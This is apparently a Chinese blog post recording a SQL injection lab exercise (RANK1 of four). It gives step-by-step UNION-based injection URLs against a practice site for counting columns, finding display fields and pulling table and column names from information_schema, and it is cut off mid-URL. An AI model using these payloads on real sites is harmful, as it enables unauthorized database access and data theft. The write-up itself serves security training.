SQL注入靶场作业——显错注入RANK1~4

本文详细记录了四个不同级别(RANK1至RANK4)的SQL注入漏洞利用过程,包括查看SQL漏洞、猜字段、找回显点、查询系统库获取表名和字段名,以及最终获取数据。通过示例URL展示如何通过注入查询获取信息。
摘要由CSDN通过智能技术生成

RANK1

一、查看是否有SQL漏洞

id=2和id=4-2回显相同内容,说明有SQL注入漏洞

二、猜字段

http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 order by 4

说明只有3个字段

三、查找回显点

2,3字段会显示,所以第2,3字段是回显点

四、系统自带库查找表名,字段名

http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1.22222%20union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1

查找到第一个表就是error_flag

第二个表是user

查找字段flag,在第三个字段

http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1%20union select 1,2,column_name from information_schema.columns where table_name='error_flag' and table_schema=database() limit 1,1

http://inject2.lab.aqlab.cn:81/Pa

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值